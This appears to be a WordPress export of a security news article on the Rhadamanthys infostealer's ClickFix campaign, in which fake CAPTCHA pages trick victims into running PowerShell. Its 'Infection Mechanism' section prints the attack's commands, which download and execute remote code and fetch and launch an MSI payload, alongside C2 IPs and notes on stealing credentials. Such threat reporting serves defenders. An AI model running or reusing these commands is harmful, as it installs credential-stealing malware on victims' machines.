{"id":5246,"date":"2025-07-10T10:04:10","date_gmt":"2025-07-10T10:04:10","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/07\/10\/rhadamanthys-infostealer-leveraging-clickfix-technique-to-steal-login-credentials\/"},"modified":"2025-07-10T10:04:10","modified_gmt":"2025-07-10T10:04:10","slug":"rhadamanthys-infostealer-leveraging-clickfix-technique-to-steal-login-credentials","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/07\/10\/rhadamanthys-infostealer-leveraging-clickfix-technique-to-steal-login-credentials\/","title":{"rendered":"Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials"},"content":{"rendered":"<p>    Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>Rhadamanthys first surfaced in 2022 as a modular stealer sold under the Malware-as-a-Service model, but its latest campaign shows how quickly it is innovating.<\/p>\n<p>At the centre of the new wave is a booby-trapped CAPTCHA page dubbed ClickFix, which instructs victims to \u201cverify\u201d their session by pasting a PowerShell command.<\/p>\n<p>Once executed, the command silently reaches out to <code>hxxps:\/\/ypp-studio[.]com\/update.txt<\/code>, turns off execution-policy safeguards and fetches the next-stage payload in memory\u2014completely fileless until the final drop.<\/p>\n<p>Dark Atlas analysts <a href=\"https:\/\/darkatlas.io\/blog\/clickfix-chaos-a-deep-dive-into-rhadamanthys-infostealers-stealth-and-steal-tactics\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">noted<\/a> that the lure pages are hosted on freshly registered typosquats, often imitating YouTube Partner Studio or similar SaaS portals, and that the underlying infrastructure has migrated from the earlier <code>77.239.96.51\/rh_0.9.0.exe<\/code> host to <code>62.60.226.74\/PTRFHDGS.msi<\/code>.<\/p>\n<p>This subtle shift breaks hard-coded IoCs used by many security tools while preserving the stealer\u2019s delivery chain.<\/p>\n<p>Campaign telemetry shows a significant uptick in infections across small-to-medium enterprises during June and early July 2025, with stolen browser cookies and cloud credentials appearing on <a href=\"https:\/\/cybersecuritynews.com\/monitoring-dark-web-threats\/\" target=\"_blank\" rel=\"noreferrer noopener\">dark-web<\/a> markets within hours of compromise.<\/p>\n<p>What makes ClickFix especially potent is its social-engineering layer. The CAPTCHA screen offers a fake sense of legitimacy while precisely guiding the victim to press <em>Win + R<\/em>, paste the command, and hit <em>Enter<\/em>.<\/p>\n<p>That single action bypasses traditional e-mail gateway filters and avoids the macros most blue teams hunt for.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiDNiFfQvF9cBad3tmUUw5Vm3KQER5PkaXUy9SginSQnK1dpXgRH-6wGJt-ySpfxO2J9QZjIwhvLiGmu7bijr-5yaijYtp2zkOcEE0nNch5_ZVYEIEmOCAlMkJf6cyzEkh6DBtgGMfAAsW8r35UPzZNS-2SaY6oDc68Vrq0CDyY6aH30SAnkr8AsdrTgwE\/s16000\/Verification%2520complete%2520%28Source%2520-%2520Dark%2520Atlas%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Verification complete (Source \u2013 Dark Atlas)<\/figcaption><\/figure>\n<\/div>\n<p>By the time a user sees the reassuring \u201cVerification complete!\u201d pop-up, <a href=\"https:\/\/cybersecuritynews.com\/rhadamanthys-stealer-rar-credentials\/\" target=\"_blank\" rel=\"noreferrer noopener\">Rhadamanthys<\/a> has already unpacked in the background and begun siphoning data to its C2 at <code>193.109.85.136<\/code>.<\/p>\n<h2 class=\"wp-block-heading\"><strong>Infection Mechanism<\/strong><\/h2>\n<p>The initial <a href=\"https:\/\/cybersecuritynews.com\/hackers-actively-exploiting-powershell\/\" target=\"_blank\" rel=\"noreferrer noopener\">PowerShell<\/a> command is heavily padded with hash symbols to evade string-based detectors, yet resolves into only two functional lines:-<\/p>\n<pre class=\"wp-block-code\"><code># Stage 1 \u2013 clipboard payload\n$u='hxxps:\/\/ypp-studio[.]com\/update.txt'; (New-Object Net.WebClient).DownloadString($u) | iex\n# Stage 2 \u2013 decoded from Stage 1\nInvoke-WebRequest -Uri http:\/\/62.60.226.74\/PTRFHDGS.msi -OutFile $env:AppData+'PTRFHDGS.msi';\nStart-Process msiexec.exe -ArgumentList '\/i', $env:AppData+'PTRFHDGS.msi';<\/code><\/pre>\n<p>Stage 1 lives only in memory; Stage 2 writes the MSI installer as <code>PTRFHDGS.msi<\/code>, which drops <code>rh_0.9.0.exe<\/code> and launches it with <code>msiexec<\/code> so that parent\/child correlations appear benign.<\/p>\n<p>The executable immediately enumerates running processes, hunting for debuggers such as <code>x64dbg.exe<\/code>, <code>ida64.exe<\/code>, or <code>ProcessHacker.exe<\/code>; if found, it terminates itself to frustrate analysis.<\/p>\n<p>It follows with time-based anti-sandbox checks using <code>QueryPerformanceCounter<\/code>, then injects into <code>WerFault.exe<\/code>\u2014a trusted Windows Error Reporting binary\u2014to persist and exfiltrate.<\/p>\n<p>A single TCP stream to the hard-coded IP carries compressed archives containing browser databases, crypto-wallet files and KeePass vaults.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgOUqG8adY3lQlfuce_r7vBJG-3HvBzvuHqFNJIizhOFmC-sruJAakISSgehyPJKzQ9BhOk5jTHeJq-ow4D8IwMFnelLjAVfO5SG52MUHPhkuwluwGGrdilVXl5G56KGeK-KjILsgtgcr7uAM0I9DBQN_YGlD029slhBc0LmarSPy7kCagha_cxRBasTjM\/s16000\/Capturing%2520screenshot%2520%28Source%2520-%2520Dark%2520Atlas%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Capturing screenshot (Source \u2013 Dark Atlas)<\/figcaption><\/figure>\n<\/div>\n<p>Screenshots captured via <code>BitBlt<\/code> are appended, giving operators a real-time window into victim activity.<\/p>\n<p>Since Rhadamanthys resolves its C2 by literal IP, DNS-layer defences see nothing, and encrypted TLS over port 443 blends seamlessly with normal traffic.<\/p>\n<p>The ClickFix campaign underscores how effortlessly adversaries can fuse social engineering with low-friction LOLBins to bypass layered defences.<\/p>\n<p>Updating signature-based rules to include execution-policy bypasses, monitoring child processes of <code>msiexec.exe<\/code>, and alerting on clipboard-sourced PowerShell are immediate steps defenders should consider.<\/p>\n<p>Yet the broader lesson is behavioural: any \u201cverification\u201d prompt that asks users to run code is suspect\u2014especially when the only thing it fixes is the attacker\u2019s foothold.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 92%,rgb(169,184,195) 100%)\">Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -&gt;\u00a0<a href=\"https:\/\/any.run\/demo?utm_source=csn&amp;utm_medium=article&amp;utm_campaign=braodo_stealer&amp;utm_content=demo_1&amp;utm_term=250625\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>Try ANY.RUN now<\/strong><\/a><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/rhadamanthys-infostealer-leveraging-clickfix\/\">Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/rhadamanthys-infostealer-leveraging-clickfix\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials Rhadamanthys first surfaced in 2022 as a modular stealer sold under the Malware-as-a-Service model, but its latest campaign shows how quickly it is innovating. At the centre of the new wave is a booby-trapped CAPTCHA page dubbed ClickFix, which instructs victims to \u201cverify\u201d their session by [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-5246","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/5246"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=5246"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/5246\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=5246"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=5246"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=5246"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}